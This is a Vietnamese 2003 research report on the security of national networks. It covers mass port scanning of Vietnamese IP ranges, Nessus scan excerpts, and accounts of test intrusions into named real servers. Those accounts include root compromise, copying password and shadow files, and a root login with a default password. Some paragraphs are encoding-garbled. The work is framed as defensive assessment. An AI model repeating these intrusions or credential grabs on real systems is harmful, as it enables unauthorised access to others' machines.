Tài liệu Đề tài Hỗ trợ bảo mật hệ thống thông tin cho các mạng tin học Việt Nam: Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
1
THÀNH PHỐ HỒ CHÍ MINH
Tháng 12 năm 2003
ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG
HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN
CHO CÁC MẠNG TIN HỌC VIỆT NAM
Báo cáo tổng quan
Chủ nhiệm đề tài:
Trịnh Ngọc Minh
Cơ quan quản lý:
Sở Khoa học và Công nghệ
Cơ quan chủ trì:
Trung tâm Phát triển Công nghệ thông tin – ĐHQG-HCM
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
2
BÁO CÁO TỔNG KẾT ĐỀ TÀI NGHIÊN CỨU
“HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN
CHO CÁC MẠNG TIN HỌC VIỆT NAM”
Thành phố Hồ Chí Minh ngày 9/12/2003
Thực hiện đề tài
KS Phạm Hòang Bảo SaigonCTT
CN Ngô Thư Chí Sao Bắc Đẩu
KS Nguyễn Như Hảo ĐHQG-HCM
CN Trương Thế Khôi SaigonCTT
TS Trịnh Ngọc Minh ĐHQG-HCM
CN Võ Hồng Minh Saigonctt
CN Thái Nguyễn Hòang Nhã Cisco Việt nam
CN Lê Minh Quốc SaigonCTT
CN Nguyễn Hòang Sang SaigonCTT
CN Nguyễn Kim Trang SaigonCTT
SV Nguyễn Anh Tú SaigonCTT
CN Đỗ Mạnh Ti...
163 trang |
Chia sẻ: hunglv | Lượt xem: 1751 | Lượt tải: 0
Bạn đang xem trước 20 trang mẫu tài liệu Đề tài Hỗ trợ bảo mật hệ thống thông tin cho các mạng tin học Việt Nam, để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
1
THÀNH PHỐ HỒ CHÍ MINH
Tháng 12 năm 2003
ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG
HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN
CHO CÁC MẠNG TIN HỌC VIỆT NAM
Báo cáo tổng quan
Chủ nhiệm đề tài:
Trịnh Ngọc Minh
Cơ quan quản lý:
Sở Khoa học và Công nghệ
Cơ quan chủ trì:
Trung tâm Phát triển Công nghệ thông tin – ĐHQG-HCM
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
2
BÁO CÁO TỔNG KẾT ĐỀ TÀI NGHIÊN CỨU
“HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN
CHO CÁC MẠNG TIN HỌC VIỆT NAM”
Thành phố Hồ Chí Minh ngày 9/12/2003
Thực hiện đề tài
KS Phạm Hòang Bảo SaigonCTT
CN Ngô Thư Chí Sao Bắc Đẩu
KS Nguyễn Như Hảo ĐHQG-HCM
CN Trương Thế Khôi SaigonCTT
TS Trịnh Ngọc Minh ĐHQG-HCM
CN Võ Hồng Minh Saigonctt
CN Thái Nguyễn Hòang Nhã Cisco Việt nam
CN Lê Minh Quốc SaigonCTT
CN Nguyễn Hòang Sang SaigonCTT
CN Nguyễn Kim Trang SaigonCTT
SV Nguyễn Anh Tú SaigonCTT
CN Đỗ Mạnh Tiến SaigonCTT
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
3
1 Hòan cảnh hình thành đề tài
Cuối năm 1999, web site của ĐHQG-HCM bị cracker từ nước ngòai thay đổi bằng một
nội dung phản động ! Đây là hồi chuông cảnh báo đầu tiên về khả năng bị tấn công từ
ngòai vào mạng ĐHQG-HCM và giúp chúng ta cảnh tỉnh về trình độ còn rất non yếu của
nhóm quản trị mạng ĐHQG-HCM về vấn để bảo mật hệ thống.
Sớm nắm được mối hiểm nguy khi kết nối vào Internet và nhận thấy sự cần thiết phải
nâng cao trình độ của cán bộ quản trị mạng, Lãnh đạo ĐHQG-HCM đã phê duyệt đề tài
nghiên cứu trọng điểm cấp ĐHQG về “An tòan và bảo mật hệ thống thông tin”. Nội dung
chính của đề tài là tìm hiểu các phương thức xâm nhập hệ thống của các hacker/cracker
nhằm nâng cao trình độ quản trị mạng và tăng cường khả năng bảo mật cho các máy chủ.
Ñeà taøi ñaõ ñöôïc trieån khai trong hôn moät naêm vaø ñöôïc nghieäm thu cuoái naêm 2001 vôùi
keát quaû toát. Noäi dung chính cuûa ñeà taøi laø tìm hieåu caùc phöông thöùc xaâm nhaäp moät heä
thoáng tin hoïc vaø ñeà ra moät soá phöông phaùp phoøng choáng nhö qui trình xaây döïng maùy
chuû an toaøn, moät soá phöông phaùp phaùt hieän backdoor …
Ñeà taøi cuûa ÑHQG chính laø böôùc chuaån bò kyõ thuaät cho pheùp trieån khai ñeà taøi ñang ñöôïc
ñeà caäp. Vôùi nhöõng kieán thöùc, kyõ naêng veà tìm hieåu caùc sô hôû cuûa heä thoáng tích luõy töø ñeà
taøi cuûa ÑHQG-HCM, chuùng ta coù theå tìm ra caùc sô hôû cuûa caùc maïng tin hoïc thoâng qua
Internet, caûnh baùo caùc nhaø quaûn trò maïng thoâng qua caùc thoâng tin “naëng kyù” nhö thoâng
baùo sô hôû vôùi nhöõng baèng chöùng nhö password cuûa admin, thoâng tin taøi khoaûn caù nhaân,
khaû naêng thay ñoåi noäi dung Website …
Töï bieát maïng tin hoïc cuûa mình sô hôû vaø töï söûa chöõa laø moät ñieàu raát khoù khaên. Vôùi hôn
moät naêm nghieân cöùu vaán ñeà baûo maät heä thoáng cuûa moät soá maïng tin hoïc cuûa Vieät nam,
keå caû caùc maïng ISP chuyeân nghieäp nhö VDC, FPT, SaigonNet, Netnam … chuùng toâi
nhaän thaáy heä thoáng maïng cuûa chuùng ta coøn nhieàu sô hôû. Tuy nhieân bieát ñöôïc heä thoáng
maïng cuûa mình bò taán coâng hoaëc ñaõ bò xaâm nhaäp laø moät vaán ñeà khoù khaên, thaäm trí
nhieàu khi raát khoù khaên. Coù hai nguyeân nhaân chính gaây neân khoù khaên treân. Tröôùc tieân
laø vaán ñeà kyõ thuaät, caùc xaâm nhaäp raát ña daïng, phong phuù vaø thay ñoåi nhanh do tieán boä
khoâng ngöøng cuûa kyõ thuaät. Sau ñoù laø trình ñoä kyõ thuaät, yù thöùc veà nguy cô cuûa caùn boä
quaûn trò heä thoáng ña phaàn coøn thaáp. Cuõng phaûi nhaän thaáy raèng baûo ñaûm moät heä thoáng
phöùc taïp, nhieàu döõ lieäu quan troïng laø moät coâng taùc meät nhoïc vaø khoù khaên. Ngöôøi quaûn
trò phaûi ñoïc nhieàu thoâng tin thoâng qua caùc taäp tin log, kieåm tra tính toaøn veïn caùc tieän
ích quan troïng, theo doõi thoâng tin treân Internet, tham gia caùc forum veà security vaø xöû
lyù caùc thoâng tin, thöôøng xuyeân naâng caáp caùc phaàn meàm vaù loã thuûng baûo maät, löu tröõ
(backup) moät caùch heä thoáng… Coâng cuï hoã trôï thöïc söï laø caàn thieát ñoái vôùi coâng taùc naøy.
Caàn thieát coù söï hoã trôï hoaøn toaøn mieãn phí vaø hieäu quaû cuûa Nhaø nöôùc ñoái vôùi caùc maïng
tin hoïc coâng cuõng nhö tö nhaân. Hieän taïi chuùng ta cuõng ñaõ coù moät soá trung taâm hoaït
ñoäng trong lónh vöïc naøy nhö VISC, trung taâm baûo maät heä thoáng Ñaïi hoïc Baùch khoa Haø
noäi... Tuy nhieân thöïc teá cho thaáy ít ñôn vò naøo töï boû ra chi phí ñeå “nhôø” ñôn vò ngoaøi
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
4
xem laïi heä thoáng maïng cuûa mình khi chöùa thaáy hoaëc khoâng bieát maïng cuûa mình bò taán
coâng. Vì vaäy söï hoã trôï mieãn phí ñeå caûnh baùo caùc maïng tin hoïc vaø trôï giuùp quyeát ñònh
ñaàu tö saâu hôn laø thöïc söï caàn thieát. Ñaàu tö giuùp caùc ñôn vò tìm ra ñieåm yeáu cuûa mình
laø hoã trôï thieát thöïc cho phaùt trieån ngaønh CNTT cuûa nöôùc ta.
Nhöõng nhaø quaûn trò maïng caàn coù coâng cuï hoã trôï hieäu quaû cho pheùp phaùt hieän caùc xaâm
nhaäp hoaëc yù ñònh xaâm nhaäp töø ngoaøi. Nhö ñaõ ñeà caäp ôû treân, phaùt hieän xaâm nhaäp laø moät
baøi toaùn khoù vaø chuùng ta caàn coù nhöõng coâng cuï maïnh nhö heä thoáng phaùt hieän xaâm
nhaäp Intrusion Detection System (IDS). Thöïc ra ñaây laø hoï goàm nhieàu caùc coâng cuï phaàn
cöùng vaø phaàn meàm khaùc nhau. Nhoùm nghieân cöùu ñaõ tìm hieåu taøi lieäu, trieån khai thöû
nghieäm, so saùnh tính naêng caùc heä thoáng khaùc nhau vaø ñöa ra caùc khuyeán caùo laø caàn
thieát.
2 Mục tiêu của đề tài
Với các phân tích như ở trên, mục tiêu chính của đề tài nhằm vào các vấn đề sau:
a/ Tìm ra caùc sô sôû cuûa caùc maïng vôùi keát noái tröïc tieáp Internet cuûa Vieät nam
b/ Thoâng baùo cho caùc maïng tin hoïc coù sô hôû loãi cuøng vôùi caùc minh chöùng. Cung caáp
caùc phöông thöùc söûa chöõa nhö download giuùp caùc phaàn meàm vaù loãi, hoaëc chæ daãn caùc
caáu hình söûa chöõa. Kieåm tra loãi sau khi ñaõ söûa chöõa.
c/ Xaây döïng website vôùi möùc ñoä baûo maät cao. Coâng boá moâ hình Website vaø phöông
thöùc xaây döïng cho pheùp caùc ñôn vò ñöôïc trieån khai mieãn phí
d/ Nghieân cöùu so saùnh caùc coâng ngheä IDS cöùng vaø meàm. Ñöa ra caùc khuyeán caùo.
3 Các nội dung chính của đề tài
a/ Khaûo saùt hieän traïng.
Phaàn khaûo saùt hieän traïng seõ goàm 2 phaàn.
Phaàn 1: Thu thaäp thoâng tin veà taát caû caùc maïng tin hoïc cuûa Vieät nam. Maïng tin hoïc Vieät
nam laø nhöõng maïng tin hoïc maø ñieåm keát noái cuûa noù naèm sau caùc coång gateway cuûa
Vieät nam. Noùi moät caùch kyõ thuaät, ñoù laø nhöõng maïng söû duïng heä thoáng ñòa chæ IP cuûa
Internic caáp phaùt cho Vieät nam. Do ñoù, nhöõng maïng tin hoïc coù teân mieàn khoâng keát
thuùc baèng .vn nhöõng ñöôïc truy caäp thoâng qua caùc IP cuûa Vieätnam seõ laø caùc ñoái töôïng
nghieân cöùu.
Caùc thoâng tin thu thaäp seõ bao goàm danh saùch caùc dòch vuï maø maïng ñoù cung caáp ra
ngoaøi, caùc ñaëc ñieåm chuyeân bieät cuûa caùc dòch vuï, heä thoáng maùy chuû vaø caùc phaàn meàm
töông öùng, caùc thieát bò maïng, ñaëc bieät laø caùc thieát bò lieân qua tôùi baûo maät.
Caùc thoâng tin naøy seõ ñöôïc thu thaäp töø nhieàu nguoàn khaùc nhau nhö duøng coâng cuï khaûo
saùt maïng, tra thoâng tin DNS, tra thoâng tin treân trang Web …
Phaàn 2: Thu thaäp thoâng tin veà caùc sô hôû cuûa maïng cuøng caùc kyõ thuaät xaâm nhaäp môùi.
Nhoùm nghieân cöùu caàn ñöôïc caäp nhaät caùc kieán thöùc veà caùc phieân baûn heä ñieàu haønh môùi
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
5
nhö Solaris 9, RedHat Linux 8, Windows Xp … cuøng vôùi caùc thoâng tin lieân quan tôùi caùc
sô hôû môùi ñöôïc phaùt hieän. Caùc kyõ thuaät xaâm nhaäp quan troïng caàn ñöôïc trieån khai thöû
nghieäm taïi caùc maïng tin hoïc maø nhoùm nghieân cöùu ñang laøm vieäc ñeå coù theå naém vöõng
caùc kyõ thuaät naøy. Caùc phieân baûn môùi cuûa heä ñieàu haønh, cuûa trình dòch vuï … caàn ñöôïc
caøi ñaët cho coâng taùc thöû nghieäm. Ngoaøi ra, nhoùm nghieân cöùu caàn phaân coâng nhau ñaêng
kyù vaøo caùc forum chuyeân ngaønh, xöû lyù thoâng tin treân ñoù vaø tìm ra nhöõng thoâng tin môùi
nhaát.
b/ Xaây döïng Web site.
Xaây döïng moät Website chuyeân bieät ñeå phuïc vuï ñeà taøi. Caùc kieán thöùc, coâng ngheä môùi
nhaát veà baûo maät moät website seõ ñöôïc trieån khai. Heä thoáng coång thoâng tin iPortal,
phöông thöïc xaùc thöïc LDAP, Radius, phöông thöùc keát noái an toaøn giöõa maùy chuû döõ
lieäu vaø maùy chuû Web, caùc tieän ích phaùt hieän xaâm nhaäp … seõ ñöôïc trieån khai ñeå coù ñöôïc
moät Web site an toaøn nhaát. Website naøy seõ laø ñoái töôïng ñaàu tieân vaø quan troïng nhaát
cuûa nhoùm nghieân cöùu taán coâng thöû nghieäm. Ngoaøi ra, nhoùm nghieân cöùu seõ môøi roäng raõi
nhöõng ngöôøi quan taâm tôùi baûo veä heä thoáng tin hoïc taán coâng thöû nghieäm Website naøy.
c/ Nghieân cöùu vaø trieån khai thöû nghieäm IDS
Hai coâng ngheä ñaõ ñöôïc nhoùm ñeà taøi nghieân cöùu laø thieát bò IDS cuûa haõng Cisco vaø phaàn
meàm snort treân heä ñieàu haønh Linux hoaëc Sun Solaris. Caùc thieát bò/phaàn meàm naøy ñaõ
ñöôïc trieån khai trong cuøng moät heä thoáng maïng vôùi Website bugsearch cuûa ñeà taøi nhaèm
xem xeùt khaû naêng phaùt hieän xaâm nhaäp thöïc teá cuõng nhö xaâm nhaäp thöû nghieäm cuûa baûn
thaân nhoùm ñeà taøi. Trong quaù trình trieån khai treân thöïc teá, nhoùm döï aùn ñaõ xem xeùt theâm
Internet Security System – ISS. Ñaây laø moät saûn phaåm IDS raát maïnh, ñaày ñuû cuûa haõng
Nokia, ñaõ ñöôïc böu ñieän Haø noäi vaø böu ñieän Tp HCM trieån khai cho 2 Trung taâm cung
caáp dòch vuï Internet môùi cuûa mình.
d/ Doø tìm sô hôû maïng
Sau khi thöïc hieän thu thaäp thoâng tin thoâng qua khaûo saùt hieän traïng, nhoùm nghieân cöùu
ñaõ trieån khai coâng taùc doø tìm caùc sô hôû.
Coâng taùc tìm sô hôû phaûi thoûa maõn caùc tieâu chí sau:
• Khoâng ñöôïc gaây baát cöù moät söï roái loaïn naøo, duø nhoû, trong hoaät ñoäng bình
thöôøng cuûa maïng.
• Khoâng ñöôïc laáy, söû duïng baát kyø baát kyø döõ lieäu naøo cuûa maïng nghieân cöùu
• Caùc baèng chöùng veà sô hôû coù tính thuyeát phuïc cao, ñaëc bieät coù tính nghieâm troïng
cuûa haäu quaû neáu bò xaâm nhaäp cho pheùp phuï traùch kyõ thuaät cuûa caùc heä thoáng
maïng coù theå thuyeát phuïc laõnh ñaïo veà caùc ñaàu tö nhaèm taêng cöôøng an ninh cuûa
maïng tin hoïc cuûa mình.
• Trong tröôøng hôïp maïng ñaõ coù sô hôû, tìm kieám caùc backdoor coù theå coù do caùc
cracker ñaõ laøm tröôùc ñoù. Ñaây laø moät noäi dung coù taàm quan troïng ñaëc bieät vì neáu
maïng ñaõ coù sô hôû thì vôùi xaùc suaát cao laø maïng ñaõ bò xaâm nhaäp vaø bò caøi
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
6
backdoor. Caùc backdoor ñoù coù theå ñöôïc che daáu tính vi vaø thöïc söï nguy hieåm
neáu khoâng phaùt hieän ñöôïc chuùng. Vôùi nhieàu heä thoáng, moät khi moät maùy coù
backdoor thì taát caû caùc thieát bò, phaàn meàm baûo maät ñaét tieàn khaùc cuûa heä thoáng
seõ bò voâ hieäu hoùa.
e/ Nghieân cöùu caùc phöông phaùp baûo veä vaø ñaùnh giaù hieäu quaû.
Sau khi phaùt hieän caùc sô hôû, ñaùnh giaù möùc ñoä nguy hieåm cuûa töøng sô hôû, nhoùm nghieân
cöùu seõ xem xeùt caùc phöông thöùc baûo veä. Caùc giaûi phaùp baûo veä khaùc phuïc sô hôû seõ ñöôïc
thoâng baùo chi tieát tôùi caùc maïng tin hoïc coù vaán ñeà. Trong khaû naêng cho pheùp, nhoùm
nghieân cöùu seõ taûi veà vaø chuyeån giao caùc phaàn meàm caàn thieát cho ñoái töôïng nghieân cöùu
cuøng vôùi caùc khuyeán caùo.
f/ Ñaøo taïo vaø chuyeån giao coâng ngheä.
Nhoùm nghieân cöùu seõ toå chöùc moät moät hoäi thaûo roäng raõi cho khoaûng 50 laõnh ñaïo vaø
chuyeân vieân IT vaø moät lôùp taäp huaán cho 20 quaûn trò vieân maïng tin hoïc, ñaëc bieät laø cho
caùc coâng ty ñaõ phoái hôïp chaët cheõ vôùi nhoùm nghieân cöùu, nhaèm naâng cao trình ñoä baûo veä
heä thoáng cuûa caùc caùn boä quaûn trò maïng. Chi phí cuûa caùc hoaït ñoäng naøy ñaõ ñöôïc döï truø
trong kinh phí cuûa ñeà taøi.
4 Các kết quả nghiên cứu đạt được
4.1 Khảo sát hệ thống địa chỉ IP cùng tên miền của các máy tính
nối mạng Internet của Việt nam
4.1.1 Phương pháp khảo sát
Lấy danh sách các tên miền của Việt nam. Hiện nay, các máy chủ tên miền của
Việt nam không cho phép thực hiện chức năng list cho phép xem các record của
tên miền. Vì vậy, nhóm triển khai phải sử dụng các nguồn thông tin thu thập từ
nhiều nguồn khác nhau và được một danh sách như trong bảng sau.
Phương pháp tiếp theo để thu thập các địa chỉ IP của Việt nam là thông qua các
thông tin của Internic về các AS đã phân bổ cho Việt nam. Sử dụng thông tin
này, chúng ta có được thông tin chính xác về các địa chỉ IP của Việt nam, nhưng
sử dụng các địa chỉ này gặp khó khăn lớn là có rất nhiều địa chỉ chưa sử dụng
và việc quét hết danh sách này tốn rất nhiều thời gian và đường truyền. Thêm
nữa đa phần các địa chỉ IP của chúng ta không có phân giải ngược IP về tên
miền nên nhiều khi nhóm dự án phát hiện sơ hở của máy chủ nhưng không xác
định được máy chủ thuộc đơn vị/công ty nào.
Nhóm dự án xây dựng một chương trình ngắn để phân giải ngược tự động các
địa chỉ IP của Việt nam.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
7
4.1.2 Kết quả thực hiện được
• Xác định rõ các địa chỉ IP của các mạng tin học Việt nam
• Tổ chức “quét” (scan) số lượng lớn các địa chỉ IP của Việt nam nhằm tìm ra
các sơ hở dựa trên các lỗi đã được công bố trên Internet. Đặc biệt, chúng tôi
có quan tâm đặc biệt tới các địa chỉ của các mạng quan trọng như Webcity,
VDC, SaigonNet, Netnam …
Các kết quả trên được trình bày cụ thể trong các phần sau.
4.2 Tìm hiểu các dịch vụ triển khai trên các máy chủ của các
mạng tin học Việt nam,
Cơ sở dữ liệu các địa chỉ IP cùng với các thông tin về dịch vụ đang mở trên từng IP là rất
quan trọng, cho phép chúng ta nhanh chóng xác định khả năng bị xâm nhập đối với một
máy tính. Giả sử ta có được thông tin từ Internet về một kiểu sơ hở, ta có thể tìm trong cơ
sở dữ liệu này địa chỉ IP có sơ hở tương ứng và nhanh chóng tiến hành xâm nhập thử
nghiệm xem có thể hiện thực hóa xâm nhập được hay không.
Theo thông tin từ APNIC, tổ chức quản lý Internet tại châu Á, Việt nam chúng ta có 3
vùng AS (Autonomous System) ( và khỏang 83456 IP
Việc “quét” tòan bộ tất cả các IP trên là một công việc lớn và làm ảnh hưởng nhiều tới
mạng của máy đi quét cũng như máy bị quét. Nhóm nghiên cứu đã phải tực hiện chủ yếu
các thao tác này vào nghỉ cuối tuần và ban đêm. Chiến lược “quét” của chúng tôi là dò
tìm tất cả các port trên một số mạng quan trọng, các IP quen biết và dò tìm một số cổng
dịch vụ phổ biến cho các IP khác.
Cụ thể là công tác dò tìm các port cơ bản được thực hiện cho
203.113.128.0 (8192)
203.160.0.0 (512)
203.161.0.0 (1024)
203.162.0.0 (4096)
apnic VN asn 18403 1 20030103 allocated
apnic VN asn 7552 1 20021008 allocated
apnic VN asn 7643 1 19971014 allocated
apnic VN ipv4 203.113.128.0 8192 20020904 allocated
apnic VN ipv4 203.160.0.0 512 19940923 assigned
apnic VN ipv4 203.161.0.0 1024 19950308 allocated
apnic VN ipv4 203.162.0.0 2048 19950809 allocated
apnic VN ipv4 203.162.128.0 4096 20010718 allocated
apnic VN ipv4 203.162.144.0 4096 20021105 allocated
apnic VN ipv4 203.162.16.0 4096 19981123 allocated
apnic VN ipv4 203.162.160.0 8192 20021105 allocated
apnic VN ipv4 203.162.32.0 8192 19981123 allocated
apnic VN ipv4 203.162.64.0 16384 20010718 allocated
apnic VN ipv4 203.162.8.0 2048 19981102 allocated
apnic VN ipv4 203.210.128.0 16384 20021105 allocated
apnic VN ipv4 210.245.0.0 8192 20020806 allocated
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
8
203.162.16.0 (12288)
203.162.64.0 (32768)
203.210.128.0 (16384)
210.245.0.0 (8192)
Tỷ lệ IP đã scan được khỏang 80 % của tòan bộ vùng IP trên.
Dò tìm rộng các port từ 1 đến 65535 cho các vùng IP
203.162.0.0(4096)
203.162.17.0/24
203.162.53.0/24
203.162.57.0/24
203.162.97.0/24
203.113.131.0/24
Tỉ lệ IP đã scan của vùng này 11.35%
Cùng với dò tìm các sơ hở một cách đại trà trên mạng, nhòm nghiên cứu cũng đã thực
hiện việc phân giải tên của các IP để biết chủ sở hữu của các IP. Với một phần mềm nhỏ,
nhóm nghiên cứu đã thử cho tất cả các địa chỉ IP nhưng chi phân giải được 783 địa chỉ,
chiếm 0,94 %. Nguyên nhân của kết quả này là rất nhiều địa chỉ IP chưa sử dụng, địa chỉ
IP dùng cho kết nối động qua dial-up, ADSL; IP dùng cho kết nối routers; và rất nhiều
tên miền không có phân giải ngược IP-> tên trong Cơ sở dữ liệu DNS. Phụ lục B sao
trính một phần các địa chỉ IP có tên miền tương ứng.
Các tiện ích được sử dụng để tiến hành thăm dò các dịch vụ đang họat động trên một
máy chủ là
• Trên Windows: SuperScan (thích hợp khi cần scan nhanh)
• Trên Unix: nmap, nessus
Kết quả thăm dò các mạng khá dài (trên 2000 trang), do đó nhóm đề tài chỉ xin trích đoạn
một số kết quả làm ví dụ:
203.113.142.14
Service Severity Description
telnet (23/tcp) Info Port is open
general/udp Low For your information, here is the traceroute to 203.113.142.14 :
192.168.20.2
192.168.20.2
192.168.20.2
203.113.142.14
telnet (23/tcp) Low An unknown service is running on this port.
It is usually reserved for Telnet
telnet (23/tcp) Low Remote telnet banner :
User Access Verification
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
9
Password:
general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to
predict the next value of the ip_id field of the ip packets sent by this host.
An attacker may use this feature to determine if the remote host sent a packet in reply
to another request. This may be used for portscanning and other things.
Solution : Contact your vendor for a patch
Risk factor : Low
general/tcp Low The remote host does not discard TCP SYN packets which have the
FIN flag set.
Depending on the kind of firewall you are using, an attacker may use this flaw to
bypass its rules.
See also :
Solution : Contact your vendor for a patch
Risk factor : Medium
BID : 7487
general/tcp Low Remote OS guess : Cisco 801/1720 running 12.2.8
CVE : CAN-1999-0454
telnet (23/tcp) Low The Telnet service is running.
This service is dangerous in the sense that it is not ciphered - that is, everyone can
sniff the data that passes between the telnet client and the telnet server. This includes
logins and passwords. You should disable this service and use OpenSSH instead.
(www.openssh.com)
Solution : Comment out the 'telnet' line in /etc/inetd.conf.
Risk factor : Low
Page 7
Network Vulnerability Assessment Report 05.08.2003
CVE : CAN-1999-0619
203.113.142.2
Service Severity Description
telnet (23/tcp) Info Port is open
telnet (23/tcp) Low The Telnet service is running.
This service is dangerous in the sense that it is not ciphered - that is, everyone can
sniff the data that passes between the telnet client and the telnet server. This includes
logins and passwords.
You should disable this service and use OpenSSH instead. (www.openssh.com)
Solution : Comment out the 'telnet' line in /etc/inetd.conf.
Risk factor : Low
CVE : CAN-1999-0619
general/tcp Low The remote host does not discard TCP SYN packets which
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
10
have the FIN flag set. Depending on the kind of firewall you are using, an
attacker may use this flaw to bypass its rules.
See also :
Solution : Contact your vendor for a patch
Risk factor : Medium
BID : 7487
general/udp Low For your information, here is the traceroute to 203.113.142.2 :
192.168.20.2
192.168.20.2
192.168.20.2
192.168.20.2
?
192.168.20.2
192.168.20.2
192.168.20.2
203.113.142.2
general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to
predict the next value of the ip_id field of the ip packets sent by this host.
Page 8
Network Vulnerability Assessment Report 05.08.2003
An attacker may use this feature to determine if the remote host sent a packet in reply
to another request. This may be used for portscanning and other things.
Solution : Contact your vendor for a patch
Risk factor : Low
general/tcp Low Remote OS guess : Cisco X.25/TCP/LAT Protocol Translator ver
8.2(4)
CVE : CAN-1999-0454
203.113.142.30
Service Severity Description
telnet (23/tcp) Info Port is open telnet (23/tcp) Low The Telnet service is running.
This service is dangerous in the sense that it is not ciphered - that is, everyone can
sniff the data that passes between the telnet client and the telnet server. This includes
logins and passwords.
You should disable this service and use OpenSSH instead.
(www.openssh.com)
Solution : Comment out the 'telnet' line in /etc/inetd.conf.
Risk factor : Low
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
11
CVE : CAN-1999-0619
general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to
predict the next value of the ip_id field of the ip packets sent by this host.
An attacker may use this feature to determine if the remote host sent a packet in reply
to another request. This may be used for portscanning and other things.
Solution : Contact your vendor for a patch
Risk factor : Low
general/udp Low For your information, here is the traceroute to 203.113.142.30 :
192.168.20.2
192.168.20.2
203.113.142.30
telnet (23/tcp) Low A telnet server seems to be running on this port
general/tcp Low Remote OS guess : Cisco 3600 running IOS 12.2(6c)
CVE : CAN-1999-0454
Page 10
Network Vulnerability Assessment Report 05.08.2003
telnet (23/tcp) Low Remote telnet banner :
User Access Verification
Username:
general/tcp Low The remote host does not discard TCP SYN packets which have the
FIN flag set. Depending on the kind of firewall you are using, an
attacker may use this flaw to bypass its rules.
See also :
Solution : Contact your vendor for a patch
Risk factor : Medium
BID : 7487
(Ngắt trích đọan ở đây …)
4.3 Các sai sót tìm thấy và có thể bị khai thác tại mạng tin học
Việt nam
Sau khi “quét” một cách hệ thống các địa chỉ IP của Việt nam và biết được các dịch vụ
mà các máy tính đang sử dụng, nhóm đề tài lựa chọn và xâm nhập thử nghiệm các máy
tính này. Kết quả thử nghiệm được trình bày ở phần sau. Với mỗi máy bị xâm nhập,
chúng tôi cố gắng xác định chủ nhân của máy, miêu tả hệ điều hành, các lỗi mà qua đó ta
có thể xâm nhập hệ thống và một số sao chép từ màn hình minh họa cho xâm nhập thành
công của nhóm đề tài. Các màn hình minh học dạng copy màn hình khôg được in ở đây
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
12
vì quá dài. Nhóm dự án sẽ kèm theo những tập tin trên đĩa CDROM để minh họa khi cần
thiết.
Các thông tin liên quan tới sơ hở, đọan chương trình cho phép khai thác sơ hở (exploit
code) được nhóm nghiên cứu tra cứu chủ yếu ở các website sau :
1) 203.162.57.227 (Suntest.vnnic.net)
a. Hệ điều hành: Solaris 8
b. Hostname: Suntest
c. Lỗi remote:
i. Telnetd exploit trên Solaris cho các version 2.6, 2.7, 2.8
ii. Exploit code đã được công bố trên internet khá lâu
iii. Dùng exploit code trên máy Linux từ xa có thể chiếm được shell với quyền của user
bin
d. Lỗi local
i. priocntl exploit trên Solaris với cấu trúc lệnh 64 bit
ii. Lỗi này cũng đã được thông báo trên internet
iii. Khai thác thành công đem lại root shell
iv. Kết quả:
1. tạo file /etc/.bugsearch
2. copy file /etc/passwd, /etc/shadow
( Exploit code, /etc/passwd,/etc/shadow và màn hình copy đính kèm ).
2) 203.162.53.51 ( Stelecom)
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
13
a. Hệ điều hành: Solaris 6.0
b. Hostname: hrl (local hostname), local IP
# /usr/sbin/ifconfig -a
lo0: flags=849 mtu 8232
inet 127.0.0.1 netmask ff000000
pnet0: flags=863 mtu
1500
inet 10.1.11.11 netmask ffffff00 broadcast 10.1.11.255
ether 8:0:20:a5:d7:82
pnet1: flags=863 mtu
1500
inet 10.1.11.14 netmask ffffff00 broadcast 10.1.11.255
ether 8:0:20:a5:d7:83
c. Lỗi remote: Telnetd, mật khẩu yếu
- Xâm nhập thành công qua 2 user: hrl và oms, user root không login từ xa được.
- Có thể khai thác lỗi của telnetd và chiếm được remote shell dưới quyền user bin
d. Lỗi local
- Thử su và dò thành công password root
- Có thể khai thác lỗi local xlock overflow
e. Các server lân cận bị khai thác
i. oms1.lgic.co.kr (10.1.11.12)
1. hostname: oms1
2. local IP: 10.1.11.12
3. hệ điều hành: Solaris 7
oms1# /usr/sbin/ifconfig -a
lo0: flags=849 mtu 8232
inet 127.0.0.1 netmask ff000000
hme0: flags=863
mtu 1500
inet 10.1.11.12 netmask ffff0000 broadcast 10.1.255.255
ether 0:3:ba:9:3a:a2
oms1#
Từ máy hrl chỉ cần telnet sang máy oms1 với user root, passwd root:
# telnet oms1.lgic.co.kr
Trying 10.1.11.12...
Connected to oms1.lgic.co.kr.
Escape character is '^]'.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
14
SunOS 5.7
welcome to oms1
don't work other jobs
login: root
Password:
